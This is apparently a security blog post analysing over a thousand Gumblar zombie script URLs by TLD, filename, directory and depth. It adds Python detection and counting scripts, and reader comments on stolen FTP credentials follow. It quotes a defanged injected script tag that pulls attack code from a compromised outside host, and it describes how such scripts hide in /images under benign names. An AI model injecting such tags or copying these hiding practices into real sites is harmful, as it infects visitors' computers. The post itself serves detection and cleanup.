
Analysis of Gumblar Zombie URLs

   29 Jun 10   Filed in General, Website exploits

As you might know, I maintain and regularly update a list of Gumblar zombie URLs. The main reason I do it is to help webmasters of compromised sites find relevant information about the source of their problems and the steps required to clean up and secure their sites. I see this pattern quite often: webmasters find a suspicious script in their web pages and use its URL in Google searches to find more information about it. On the other hand, this list can also help reveal the security breach of the sites that hackers use to host Gumblar zombie scripts.

This week the list has reached the level of 1,000+ URLs. Although it’s just a small part of all Gumblar zombie scripts, this list makes a good base for a quick analysis of Gumblar zombie URLs.

What is a Gumblar zombie script?

On some compromised websites, Gumblar creates a new file with a .php extension. A reference to this file is then injected into the web pages of other compromised sites as a script tag:

<script src=hxxp://hacked-site.com/subdirectory/zombie-script.php ></script>

This script either silently attacks web surfers' computers by loading binary exploit files from the same zombie site, or loads yet another zombie script from a third-party zombie site.

The zombie scripts are not linked to from any existing files on the same zombie site. They are hidden somewhere in the directory structure and have names that look trustworthy to site owners (usually the name of some existing legitimate file with a .php extension appended). This is why webmasters of compromised sites (Gumblar zombies) are usually completely unaware of such scripts on their sites, and are puzzled when Google blacklists their sites and reports that they host malicious content and infect other sites. Although my list is not complete, it helps webmasters locate zombie scripts on their sites.
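The injected tag shown above is usually the first thing a webmaster notices. As an added example (not code from the original post or from the Unmask Parasites service), the following Python script pulls references of that shape out of a page: every script tag whose src resolves to a .php file on a host other than the page's own. The page it scans is a constructed sample, and the hxxp:// notation is the post's defanged form, restored before parsing. Same-host .php scripts (e.g. /contact.php) are deliberately not reported, since those are usually the site's own code.

```python
"""Find remote .php <script> references of the kind Gumblar injects.

Added example, not code from the original post or the Unmask Parasites
service. SAMPLE_PAGE is a constructed HTML document; the hxxp:// scheme is
the post's defanged notation and is restored before parsing.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample page: two injected tags among legitimate script and link tags.
SAMPLE_PAGE = """<html><head>
<link rel="stylesheet" href="css/style.css">
<script src="js/app.js"></script>
<script src="https://cdn.example.org/lib.js"></script>
</head><body>
<p>Hello</p>
<script src=hxxp://hacked-site.com/subdirectory/zombie-script.php ></script>
<script src=hxxp://another-victim.example/images/gifimg.php></script>
<script src="/contact.php"></script>
</body></html>"""


class ScriptSrcCollector(HTMLParser):
    """Collect the src attribute of every <script> tag; unquoted values like the injected ones are handled."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value.strip())


def refang(text):
    """Turn hxxp:// and hxxps:// back into real schemes so urlsplit can parse them."""
    return text.replace("hxxps://", "https://").replace("hxxp://", "http://")


def find_injected_scripts(page_url, html):
    """Return absolute URLs of <script src> values that point to a .php file on another host.

    Relative src values are resolved against page_url; a same-host .php script
    may well be legitimate, so only off-host targets are reported.
    """
    collector = ScriptSrcCollector()
    collector.feed(refang(html))
    collector.close()
    own_host = urlsplit(page_url).hostname
    hits = []
    for src in collector.srcs:
        absolute = urljoin(page_url, src)
        parts = urlsplit(absolute)
        if parts.hostname and parts.hostname != own_host and parts.path.lower().endswith(".php"):
            hits.append(absolute)
    return hits


if __name__ == "__main__":
    for url in find_injected_scripts("http://victim.example/index.html", SAMPLE_PAGE):
        print("injected script:", url)
```

The URLs this returns are exactly what goes into a zombie URL list; each one names a second compromised site whose owner should be told.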

And the below analysis of this list reveals interesting details both about the Gumblar attack and about its zombie URLs.

Analysis

I analyzed 1042 Gumblar zombie URLs.

Top level domains

The attack affects sites all over the world. My list contains sites with 73 different top level domains. Of course, .com sites (as the most wide-spread) are the most affected.

------------------- Top 10 TLDs ---------------------
Rank  TLD         Count   Share
  1   .com          452   43.4%
  2   .net           77    7.4%
  3   .ru            57    5.5%
  4   .org           48    4.6%
  5   .hu            37    3.6%
  6   .de            32    3.1%
  7   .in            25    2.4%
  8   .pl            23    2.2%
  9   .kr            23    2.2%
 10   .ar            17    1.6%
  :   the rest      251   24.1%


File names

The 1042 URLs contain 749 unique filenames. As I already mentioned, the names are usually a combination of the name of some existing file and a .php extension, so it is no wonder that the most popular name of a zombie script is index.php. However, hackers sometimes use a filename specific to the Gumblar attack that doesn't match any existing file: gifimg.php. It is the second most popular name of Gumblar zombie scripts.

---------------- Top 10 Filenames -------------------
Rank  Filename        Count   Share
  1   index.php         73    7.0%
  2   gifimg.php        55    5.3%
  3   contact.php       13    1.2%
  4   style.php          9    0.9%
  5   error_log.php      8    0.8%
  6   _vti_inf.php       8    0.8%
  7   LICENSE.php        8    0.8%
  8   favicon.php        7    0.7%
  9   .ftpquota.php      7    0.7%
 10   robots.php         7    0.7%
  :   the rest         847   81.3%


Directories

To make zombie scripts less prominent, hackers create them in subdirectories of hacked sites. In my list of 1042 URLs I found 562 unique paths (excluding filenames) to the rogue scripts. The most popular location of Gumblar zombie scripts is the /images directory (16.5%). It is a very good place to hide malicious files: webmasters rarely check directories with image files when they are searching for something that can contain executable code. Moreover, a file with a benign-looking name (e.g. gifimg.php) is easily overlooked. Note that a web server configured to run PHP executes a .php file in /images just as readily as one in the site root, so the directory hides the script from people, not from the server. Other service directories (e.g. /cgi-bin, /_vti_bin, /css, /tmp, /js) are also among the popular locations.

The tenth position has an empty path: in less than 1% of cases the zombie script was found directly in the site root directory.

----------------- Top 10 directories ----------------
Rank  Directory        Count   Share
  1   /images            172   16.5%
  2   /cgi-bin            24    2.3%
  3   /_vti_bin           21    2.0%
  4   /css                18    1.7%
  5   /img                15    1.4%
  6   /tmp                13    1.2%
  7   /wp-content         12    1.2%
  8   /js                 10    1.0%
  9   /wp-admin           10    1.0%
 10   / (site root)        9    0.9%
  :   the rest           738   70.8%


Subdirectory levels

In the majority of cases (91.5%), zombie scripts can be found in a subdirectory one level deep, e.g. /images/zombie.php or /tmp/zombie.php. However, sometimes their location is as deep as 3 levels from the site root, e.g. /_flash/_notes/vz29/zombie.php. In nine cases (<1%), zombie scripts were found in the root directory (0 levels deep).
---------- Location relative to site root -----------
Rank  Depth            Count   Share
  1   1 level deep       953   91.5%
  2   2 levels deep       56    5.4%
  3   3 levels deep       24    2.3%
  4   0 levels deep        9    0.9%

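The four breakdowns above (TLDs, filenames, directories, depth) can be recomputed from any plain list of zombie URLs. The following Python script is an added example, not the author's own tooling: it reads one URL per line and tallies the same four things, printing tables in the shape used above. The seven-entry SAMPLE_URLS list is constructed for illustration and stands in for the real list, which is not reproduced here; counting only the last host label as the TLD (so a .co.uk site lands under .uk) is my simplification.

```python
"""Tally a list of Gumblar zombie URLs by TLD, filename, directory and depth.

Added example, not part of the original post. SAMPLE_URLS is a constructed
stand-in for the real 1,042-entry list and uses the post's defanged hxxp://
notation, one URL per line.
"""
from collections import Counter
from urllib.parse import urlsplit
import posixpath

# Constructed sample; hosts and paths are made up for illustration.
SAMPLE_URLS = """
hxxp://hacked-site.com/images/gifimg.php
hxxp://www.example.net/images/index.php
hxxp://example.org/_vti_bin/_vti_inf.php
hxxp://shop.example.co.uk/index.php
hxxp://example.de/_flash/_notes/vz29/contact.php
hxxp://example.ru/cgi-bin/style.php
hxxp://example.com/wp-content/uploads/favicon.php
"""


def refang(url):
    """Restore a parseable scheme from the defanged hxxp:// or hxxps:// notation."""
    if url.startswith("hxxps://"):
        return "https://" + url[len("hxxps://"):]
    if url.startswith("hxxp://"):
        return "http://" + url[len("hxxp://"):]
    return url


def tld(host):
    """Last label of the host name, as in the post's table (.co.uk is counted as .uk)."""
    return "." + host.rsplit(".", 1)[-1].lower()


def analyze(url_list):
    """Return counters keyed by TLD, filename, directory (path minus filename) and depth."""
    stats = {"total": 0, "tld": Counter(), "filename": Counter(),
             "directory": Counter(), "depth": Counter()}
    for line in url_list.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = urlsplit(refang(line))
        if not parts.hostname:
            continue  # not an absolute URL: skip rather than guess
        path = parts.path or "/"
        directory, filename = posixpath.split(path)
        stats["total"] += 1
        stats["tld"][tld(parts.hostname)] += 1
        stats["filename"][filename] += 1
        stats["directory"][directory or "/"] += 1
        # depth = number of directory levels between the site root and the file
        stats["depth"][path.strip("/").count("/")] += 1
    return stats


def top(counter, total, k=10):
    """Rows (label, count, percent) for the k most common keys plus a 'the rest' row."""
    rows = [(key, c, round(100.0 * c / total, 1)) for key, c in counter.most_common(k)]
    rest = total - sum(c for _, c, _ in rows)
    if rest:
        rows.append(("the rest", rest, round(100.0 * rest / total, 1)))
    return rows


def print_report(stats):
    """Print the four tables in the same layout as the post."""
    sections = (("TLDs", "tld"), ("Filenames", "filename"),
                ("directories", "directory"), ("Location relative to site root", "depth"))
    for title, key in sections:
        print(f"---- {title} ----")
        for rank, (label, count, pct) in enumerate(top(stats[key], stats["total"]), 1):
            if key == "depth" and label != "the rest":
                label = f"{label} level(s) deep"
            elif label == "/":
                label = "/ (site root)"
            rank_s = ":" if label == "the rest" else str(rank)
            print(f"{rank_s:>3}  {label:<40} {count:>4} {pct:>5}%")


if __name__ == "__main__":
    print_report(analyze(SAMPLE_URLS))
```

Feed it the real list (one URL per line, defanged or not) and the numbers should line up with the tables above; the directory counter is keyed on the full path minus the filename, which is why /wp-content/uploads and /wp-content are separate rows, just as in the post's counting.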

Web servers

Gumblar breaks into web sites using stolen FTP credentials. This means that, regardless of web server technology, any site is potentially vulnerable to this sort of attack (as long as its webmasters use FTP). My list of Gumblar zombie URLs provides enough evidence of this: you can find filenames and directories specific to different web server technologies.

For example:

  • .htaccess.php files — Apache
  • _vti_bin directories and _vti_inf.php files — sites powered by Microsoft technologies
  • WEB-INF/classes/v7j/servertest.class.php — Tomcat

“s” directories

On many websites, next to a Gumblar zombie script there is a directory called s. It contains Gumblar service and log files. If you find it on your server, make sure to delete it along with the zombie script.

Have your say

Did you notice any other interesting patterns in the list of Gumblar zombie URLs? Your comments are welcome!


Reader's Comments (3)

  1. [...] This post was mentioned on Twitter by Rodrigo (Sp0oKeR) and Denis, Gumblar. Gumblar said: Blog: Analysis of Gumblar Zombie URLs | Unmask Parasites. Blog. http://bit.ly/9Iz9qq [...]

  2. I think one way they are getting into websites is acting as programmers for hire via websites like freelancer.com. They say they cannot do the work without your FTP details. And there you go, you just paid someone to hack your site and put you out of business. I hired a freelance programmer from the UK and right away my site had a Gumblar.

     • Sounds like a very ineffective way to infect websites ;-)

       The most probable scenario is that the programmer's computer was infected and your FTP credentials were stolen from his computer.

       Anyway, if you have to give FTP access to third parties, try to provide them with the most restrictive permissions possible. And once the job is done, change the passwords right away.